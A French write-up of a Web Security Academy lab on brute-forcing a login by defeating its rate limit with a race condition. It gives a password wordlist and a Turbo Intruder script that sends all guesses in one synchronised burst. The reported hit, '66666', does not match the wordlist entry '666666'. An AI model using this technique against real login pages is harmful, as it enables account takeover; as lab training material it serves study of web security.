Contournement d’une limitation de débit via Race condition

Bypassing rate limits via race conditions

Lab: Bypassing rate limits via race conditions | Web Security AcademyWebSecAcademy

Le mécanisme d’authentification met en place une limitation du nombre de tentatives afin d’empêcher les attaques par force brute. Cependant, on observe que cette protection peut être contournée à cause d’une condition de course lors du traitement des requêtes simultanées.

Objectif du lab :

Exploiter la condition de course pour contourner la limitation.
Retrouver le mot de passe de l’utilisateur carlos.
Se connecter à l’application.
Accéder au panneau d’administration.
Supprimer l’utilisateur carlos.

Wordlist utilisée

123123
abc123
football
monkey
letmein
shadow
master
666666
qwertyuiop
123321
mustang
123456
password
12345678
qwerty
123456789
12345
1234
111111
1234567
dragon
1234567890
michael
x654321
superman
1qaz2wsx
baseball
7777777
121212
000000

Observation du mécanisme de connexion

Lors de l’envoi du formulaire de login, on observe qu’une requête POST est transmise avec les paramètres suivants :

csrf
username
password

csrf=8SbZ2jaR8pdJ0Q4r0XNqmTeVk5GJHxsx&username=wiener&password=peter

Après plusieurs tentatives incorrectes consécutives, on constate l’apparition du message :

You have made too many incorrect login attempts. Please try again in XX seconds.

Cela confirme la présence d’un rate limit côté serveur.

Contournement par condition de course (tests manuels)

Création d’un groupe “race condition”.

Duplication de l’onglet 10 fois.

Envoi de toutes les requêtes en parallèle.

Test :

csrf=ab5gEWlWPKDUCJCQAlxrxR42dLIhJCWR&username=wiener&password=test

Observation : en envoyant en parallèle, le blocage ne se déclenche pas dans ce cas.

Brute force parallèle sur carlos avec Turbo Intruder

Installation / utilisation de l’extension Turbo Intruder.

Depuis la requête de login : Send to Turbo Intruder.

Choix du script race single packet attack.py.

Copie de la wordlist dans le clipboard, puis exécution avec ce script :

def queueRequests(target, wordlists):

    # if the target supports HTTP/2, use engine=Engine.BURP2 to trigger the single-packet attack
    # if they only support HTTP/1, use Engine.THREADED or Engine.BURP instead
    # for more information, check out https://portswigger.net/research/smashing-the-state-machine
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=1,
                           engine=Engine.BURP2
                           )


    passwords = wordlists.clipboard
    # the 'gate' argument withholds part of each request until openGate is invoked
    # if you see a negative timestamp, the server responded before the request was complete
    for password in passwords:
        engine.queue(target.req, password, gate='race1')

    # once every 'race1' tagged request has been queued
    # invoke engine.openGate() to send them in sync
    engine.openGate('race1')


def handleResponse(req, interesting):
    table.add(req)

Résultat observé

En testant toutes les valeurs en parallèle, on constate qu’un mot de passe renvoie un code HTTP 302 (indicateur de succès de login).

“66666” renvoie 302 (mot de passe candidat, à valider tel quel selon la valeur exacte testée).

Mis à jour il y a 1 mois

hashtagBypassing rate limits via race conditions

hashtagWordlist utilisée

hashtagObservation du mécanisme de connexion

hashtagContournement par condition de course (tests manuels)

hashtagBrute force parallèle sur carlos avec Turbo Intruder

hashtagRésultat observé